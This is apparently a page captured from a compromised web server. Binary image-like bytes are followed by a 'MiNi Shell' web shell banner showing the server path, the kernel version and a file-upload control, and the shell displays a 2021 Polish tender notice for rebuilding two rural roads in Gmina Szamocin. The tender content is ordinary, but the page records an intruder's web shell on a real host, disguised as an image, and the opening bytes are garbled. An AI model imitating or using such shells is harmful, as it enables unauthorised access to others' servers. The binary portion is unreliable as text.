JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210621/0008850001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00088500 z dnia 2021-06-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg w Gminie Szamocin<br/>CZĘŚĆ NR 1: PRZEBUDOWA DROGI GMINNEJ DOJAZDOWEJ DO GRUNTÓW ROLNYCH W KOSARZYNIE<br/>CZĘŚĆ NR 2: PRZEBUDOWA DROGI GMINNEJ DOJAZDOWEJ DO GRUNTÓW ROLNYCH W SZAMOTACH </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Szamocin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791046</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Wolności 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szamocin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-820</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">67 28 48 003</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">67 28 48 065</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminaszamocin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.gminaszamocin.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg w Gminie Szamocin<br/>CZĘŚĆ NR 1: PRZEBUDOWA DROGI GMINNEJ DOJAZDOWEJ DO GRUNTÓW ROLNYCH W KOSARZYNIE<br/>CZĘŚĆ NR 2: PRZEBUDOWA DROGI GMINNEJ DOJAZDOWEJ DO GRUNTÓW ROLNYCH W SZAMOTACH </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-856baadd-d259-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00088500</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001398/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Przebudowa drogi dojazdowej do gruntów rolnych w Kosarzynie</p> <p class="mb-0">1.1.7 Przebudowa drogi dojazdowej do gruntów rolnych w Szamotach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.gminaszamocin.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przetargi.gminaszamocin.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja pomiędzy Zamawiającym, a wykonawcami w toku prowadzenia postępowania odbywać się będzie za pośrednictwem poczty elektronicznej na adres e-mail: przetargi@gminaszamocin.pl<br/>2.Zamawiający dopuszcza możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt 1 adres e-mail ( z wyłączeniem dokumentów składanych wraz z ofertą ). <br/>3.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie Zamówień Publicznych Urzędu Miasta i Gminy Szamocin (Platformie ZETO PZP). Wykonawca posiadający konto na Platformie ZETO PZP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku”.<br/>4.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w „Regulaminie korzystania z Platformy ZETO PZP” oraz „Instrukcji obsługi systemu PZP przeznaczoną dla Wykonawcy”.<br/>5.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>6.Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie ZETO PZP tj.:<br/>stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych -MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji z wyjątkiem Internet Explorer;<br/>włączona obsługa JavaScript;<br/>zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Użytkownika lub aplikacja komputerowa spełniająca funkcje takiego czytnika (tzw. podpis chmurowy).<br/>7.Za datę przekazania oferty, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na Platformę ZETO PZP.<br/>8.Zamawiający przekazuje link do postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w Platformie ZETO PZP.<br/>9. Składanie ofert odbywa się przy użyciu Platformie ZETO PZP, który dostępny jest pod adresem: https://przetargi.gminaszamocin.pl/<br/>10.Wykonawca składa ofertę za pośrednictwem „Dodaj ofertę” dostępnego na Platformie ZETO PZP.<br/>11.Wszystkie dokumenty i informacje składające się na ofertę są automatycznie szyfrowane w chwili ich przesłania na serwer ZETO (co następuję automatycznie). Użytkownicy składający ofertę nie muszą więc samodzielnie, korzystając z aplikacji zewnętrznych, szyfrować załączanych do Platformy ZETO PZP dokumentów<br/>12.Ofertę należy sporządzić w języku polskim, z zachowaniem formy elektronicznej lub postaci elektronicznej w formacie danych doc, docx, pdf.<br/>13. Zgodnie z § 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452), określa dopuszczalny format podpisu elektronicznego, jako:<br/>dokumenty w formacie „pdf" <br/>-zaleca się podpisywać formatem PAdES,<br/>dopuszcza się podpisanie dokumentów w formacie innym niż „pdf", wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące RODO zawarto w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Nr sprawy: DR.7011.1.2021, DR.7011.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Projektuje się przebudowę drogi gminnej zlokalizowanej na działkach o numerach ewidencyjnych 177, 24/2, które stanowią istniejący pas drogowy oraz działce nr 20 stanowiącej własność Gminy Szamocin. Projektuje się przebudowę o długości 327,50 m ( licząc od osi skrzyżowania). Przebudowa polega na wykonaniu nowej pełnej konstrukcji jezdni o szerokości 5,00 m z betonu asfaltowego wraz z obustronnymi poboczami o szerokości 0,75 m z kruszywa granitowego. Na końcu projektowanej drogi projektuje się plac nawrotu o wymiarach 12,50 m x 13,50 m. W ramach inwestycji zostanie wykonany zjazd z kostki betonowej na posesję.<br/>W miejscu połączenia przebudowywanej drogi gminnej z ulicą Ogrodową zaprojektowano łuki wyokrąglające o promieniach R=6,00 m.<br/>Geometrię przebiegu przebudowywanej drogi gminnej pokazano na rysunku nr 2 – plan sytuacyjny.<br/>Niweleta:<br/>Niweletę przebudowywanej drogi nieznacznie podniesiono w stosunku do istniejącej nadając odpowiednie spadki podłużne i poprzeczne w celu prawidłowego odprowadzenia wód opadowych i roztopowych z projektowanej nawierzchni drogi. Niweletę drogi gminnej należy wykonać według rysunku nr 3 – przekroje podłużne.<br/>Przekrój normalny:<br/>Przekrój normalny przyjęto jak dla drogi klasy dojazdowej „D” jak niżej:<br/>- szerokość jezdni 5,00 m<br/>- spadek jezdni jednostronny i=2% w kierunku poboczy<br/>Projektuje się konstrukcję nawierzchni jezdni drogi gminnej jak dla drogi o kategorii ruchu KR1 jak niżej:<br/>Pełna konstrukcja jezdni:<br/>- podłoże gruntowe z piasku<br/>- warstwa dolnej podbudowy grubości 15 cm z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 0/63,0 mm<br/>- warstwa górnej podbudowy grubości 8 cm z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 0,0/31,5 mm<br/>- warstwa wyrównawcza grubości 5 cm z betonu asfaltowego o uziarnieniu 0/16 mm (AC16W)<br/>- warstwa ścieralna grubości 4 cm z betonu asfaltowego o uziarnieniu 0/11 mm (AC11S)<br/>Konstrukcja nawierzchni zjazdu:<br/>- podłoże gruntowe z piasku<br/>- warstwa podbudowy dolnej grubości 15 cm z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/63 mm<br/>- warstwa podbudowy górnej grubości 8 cm z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/63 mm<br/>- warstwa grubości 4 cm z podsypki cementowo – piaskowej 1:4<br/>- warstwa ścieralna z kostki brukowej betonowej grubości 8 cm koloru szarego<br/>Obramowanie konstrukcji zjazdu to krawężnik betonowy 12x25 cm od strony jezdni drogi gminnej obramowanie to krawężnik betonowy 15x22 cm najazdowy. Obramowania należy wykonać na ławie betonowej z oporem z betonu C12/15.<br/>Przekrój konstrukcyjny nawierzchni jezdni przebudowywanej drogi przedstawiono na rysunku nr 5 – przekrój normalny.<br/>Odwodnienie:<br/>	Wody opadowe i roztopowe z powierzchni jezdni, odprowadzane będą poprzez nadane spadki podłużne i poprzeczne w kierunku poboczy i terenów zielonych.<br/>Roboty ziemne:<br/>Roboty zmienne ( wykopy) sprowadzają się do wykonania koryta pod projektowaną konstrukcję jezdni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę 1%=1 punkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Projektuje się przebudowę drogi gminnej zlokalizowanej na działkach o numerach ewidencyjnych 319, 312/5, 507/1, 312/7, 313 i 274, które stanowią istniejący pas drogowy. Projektuje się przebudowę na długości 301,50 m ( licząc od osi skrzyżowania z droga wojewódzką nr 191 do osi skrzyżowania z droga powiatową nr 1497P). Przebudowa polega na wykonaniu nowej pełnej konstrukcji jezdni o szerokości 4,00 m z betonu asfaltowego wraz z obustronnymi poboczami o szerokości 0,50 m ( przed skrzyżowaniem z drogą wojewódzką pobocza o szerokości 0,75 m) z kruszywa granitowego. Nie zmienia się przebiegu trasy w planie.<br/>W miejscu połączenia przebudowywanej drogi gminnej z drogą wojewódzką nr 191 zaprojektowano łuki wyokrąglające krawędź jezdni o promieniach R= 6,00 m oraz w miejscu połączenia przebudowywanej drogi gminnej z drogą powiatową zaprojektowano łuki wyokrąglające krawędź jezdni o promieniach R= 4,00 m.<br/>W ramach inwestycji przebudowie ulegnie istniejący przepust pod drogą gminną w ciągu rowu przydrożnego drogi wojewódzkiej nr 191. Przebudowa polegać będzie na wymianie istniejącej rury na nową PEHD 400 przy niezmienionych rzędnych wysokościowych wlotu i wylotu, które należy obrukować kamieniem polnym ułożonym na zaprawie cementowej. Ponadto istniejący rów przydrożny podlegał będzie odmuleniu wraz z wyprofilowaniem skarp na długości po 30,0 m od przebudowywanej drogi gminnej w obie strony.<br/>Geometrię przebiegu przebudowywanej drogi gminnej pokazano na rysunku nr 2 – plan sytuacyjny.<br/>Niweleta:<br/>	Niweletę przebudowywanej drogi zasadniczo poprowadzono po terenie nadając odpowiednie spadki podłużne i poprzeczne w celu prawidłowego odprowadzenia wód opadowych i roztopowych z projektowanej nawierzchni drogi i pobliskich pól. Niweletę drogi gminnej należy wykonać według rysunków nr 3.1 i 3.2 – przekroje podłużne.<br/>Przekrój normalny:<br/>Przekrój normalny przyjęto jak dla drogi klasy dojazdowej „D” jak niżej:<br/>- szerokość jezdni 4,00 m<br/>- spadek jezdni jednostronny i=2% w kierunku poboczy ( według planu sytuacyjnego)<br/>- szerokość poboczy 0,50 m ( przed skrzyżowaniem z drogą wojewódzką pobocza o szerokości 0,75 m )<br/>Projektuje się konstrukcję nawierzchni jezdni drogi gminnej jak dla drogi o kategorii ruchu KR1 jak niżej:<br/>Pełna konstrukcja jezdni:<br/>- warstwa odsączająca grubości 20 cm z piasku średnioziarnistego<br/>- warstwa dolnej podbudowy grubości 15 cm z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 0/63,0 mmm<br/>- warstwa górnej podbudowy grubości 8 cm z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 0,0/31,5 mm<br/>- warstwa wyrównawcza grubości 5 cm z betonu asfaltowego o uziarnieniu 0/16 mm ( AC16W)<br/>- warstwa ścieralna grubości 4 cm z betonu asfaltowego o uziarnieniu 0/11 mm ( AC11S)<br/>Na połączeniu istniejącej nawierzchni drogi wojewódzkiej i drogi powiatowej z projektowaną z projektowaną jezdnią drogi gminnej należy zastosować geosiatkę 100x200 kN ( wstępnie powlekaną bitumem ) wg szczegółów na rys. nr 3.1 i 3.2<br/>Przekroje konstrukcyjne nawierzchni jezdni przebudowywanej drogi przedstawiono na rysunkach nr 5.1 i 5.2 – przekroje normalne.<br/>Odwodnienie:<br/>Wody opadowe i roztopowe z powierzchni projektowanej jezdni, odprowadzane będą poprzez odpowiednio nadane spadki podłużne i poprzeczne na pobocza i tereny przyległe.<br/>Roboty ziemne:<br/>Roboty zmienne ( wykopy) sprowadzają się do wykonania koryta pod projektowaną konstrukcję jezdni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę 1%=1 punkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunku w tym zakresie.<br/>3)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie określa warunku w tym zakresie.<br/>4)	sytuacji ekonomicznej i finansowej<br/>a) posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 200.000 zł, na każdą część zamówienia co potwierdzą poprzez złożenie aktualnej informacji banku;<br/>5) zdolności technicznej lub zawodowej<br/>a) posiadają doświadczenie umożliwiające realizację zamówienia tzn. wykonali należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 roboty budowlane, z których każda polegała na budowie lub przebudowie drogi o wartości minimum 200 000,00 zł brutto, co potwierdzą w wykazie wykonanych robót oraz referencjami;<br/>b) dysponują lub będą dysponować kierownikiem budowy/robót posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie 